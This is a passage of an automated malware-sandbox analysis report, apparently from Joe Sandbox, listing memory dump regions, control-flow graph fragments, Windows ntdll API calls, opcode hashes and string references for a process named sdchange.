                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: b21e8efad66c756346697c681541e03d122baecf83a2d84f4483872c5e41af1c
                                              • Instruction ID: 79b4d8a1e9b92757fbe39af7102d384820983f128f22a1296641ae45a1a50bc1
                                              • Opcode Fuzzy Hash: b21e8efad66c756346697c681541e03d122baecf83a2d84f4483872c5e41af1c
                                              • Instruction Fuzzy Hash: B590026220240003610571594454616400ACBE0206B55C065F1415591DC526D9926125
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c62e8108c49920d7eebfb667f8cb3f46bedf9c34c8ac244f5c41a7c95f25597d
                                              • Instruction ID: 978233556863168cfab8ab09d7859f4bd39efe9ac5458393e2d3fb72496f6949
                                              • Opcode Fuzzy Hash: c62e8108c49920d7eebfb667f8cb3f46bedf9c34c8ac244f5c41a7c95f25597d
                                              • Instruction Fuzzy Hash: 2490023260550402F100715945547061005CBD0206F65C455B0825569D8796DA5265A2

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 272 2c648d0-2c648ec 273 2c648f4-2c648f9 272->273 274 2c648ef call 2c7c530 272->274 275 2c648ff-2c6490d call 2c7cb30 273->275 276 2c648fb-2c648fe 273->276 274->273 279 2c6490f-2c6491a call 2c7cdd0 275->279 280 2c6491d-2c6492e call 2c7afd0 275->280 279->280 285 2c64947-2c6494a 280->285 286 2c64930-2c64944 LdrLoadDll 280->286 286->285
                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000000,02C7632A), ref: 02C64942
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 18d9689ef8b136b2521bd402d68eb4271b622a9e13267d14b467ee2ee30fe7b6
                                              • Instruction ID: 254c7e6a53b16d4aa1b66183c92f852cfb4ca5ee90245ed08b9955a92a924281
                                              • Opcode Fuzzy Hash: 18d9689ef8b136b2521bd402d68eb4271b622a9e13267d14b467ee2ee30fe7b6
                                              • Instruction Fuzzy Hash: C70121B5E4020EABDF24EBE4DC85FADB779AF54308F004195E91897240F631E714DB91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 287 2c79bc0-2c79c01 call 2c514a0 call 2c7aaf0 RtlAllocateHeap
                                              APIs
                                              • RtlAllocateHeap.NTDLL(02C7CA2C,?,02C7838E,02C7CA2C,02C78C76,02C7838E,?,02C7CA2C,?,00001000,490FEF06), ref: 02C79BFC
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 1527f981cec88ebcf02d84f9f6a1e278167d003b0124b159ed1d5ec4c9e5cdb0
                                              • Instruction ID: 4ba0b235c5793814cc9628a9f8fd663c78c5fb336d4a46cd577c5d71c48932dd
                                              • Opcode Fuzzy Hash: 1527f981cec88ebcf02d84f9f6a1e278167d003b0124b159ed1d5ec4c9e5cdb0
                                              • Instruction Fuzzy Hash: 1FE0E5722402587BD614EE99DC46FAB77ADEFC9720F408419F909A7241D670B9508BB8

                                              Control-flow Graph

                                              control_flow_graph 292 2c79c10-2c79c54 call 2c514a0 call 2c7aaf0 RtlFreeHeap
                                              APIs
                                              • RtlFreeHeap.NTDLL(?,02C7838E,490FEF06,?,00000000,490FEF06,02C7838E,?,?,?,?,?,?,?,?), ref: 02C79C4F
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0

                                              Control-flow Graph

                                              control_flow_graph 302 2c684c7-2c684f9 call 2c51410 call 2c72020 307 2c68502-2c68505 302->307 308 2c684fb-2c68500 SetErrorMode 302->308 308->307
                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,02C620A0,02C7838E,?,?), ref: 02C68500
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0

                                              Control-flow Graph

                                              control_flow_graph 309 2c684d0-2c684d3 310 2c684dd-2c684f9 call 2c72020 309->310 311 2c684d8 call 2c51410 309->311 314 2c68502-2c68505 310->314 315 2c684fb-2c68500 SetErrorMode 310->315 311->310 315->314
                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,02C620A0,02C7838E,?,?), ref: 02C68500
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0

                                              Control-flow Graph

                                              control_flow_graph 316 4bb2c0a-4bb2c0f 317 4bb2c1f-4bb2c26 LdrInitializeThunk 316->317 318 4bb2c11-4bb2c18 316->318
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              Strings
                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04BE46FC
                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04BE4655
                                              • ExecuteOptions, xrefs: 04BE46A0
                                              • Execute=1, xrefs: 04BE4713
                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 04BE4787
                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04BE4725
                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04BE4742
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                              • API String ID: 0-484625025
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-$0$0
                                              • API String ID: 1302938615-699404926
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$[$]:%u
                                              • API String ID: 48624451-2819853543
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04BE02E7
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04BE02BD
                                              • RTL: Re-Waiting, xrefs: 04BE031E
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                              • API String ID: 0-2474120054
                                              Strings
                                              • RTL: Resource at %p, xrefs: 04BE7B8E
                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04BE7B7F
                                              • RTL: Re-Waiting, xrefs: 04BE7BAC
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 0-871070163
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04BE728C
                                              Strings
                                              • RTL: Resource at %p, xrefs: 04BE72A3
                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04BE7294
                                              • RTL: Re-Waiting, xrefs: 04BE72C1
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-605551621
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$]:%u
                                              • API String ID: 48624451-3050659472
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-
                                              • API String ID: 1302938615-2137968064
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $$@
                                              • API String ID: 0-1194432280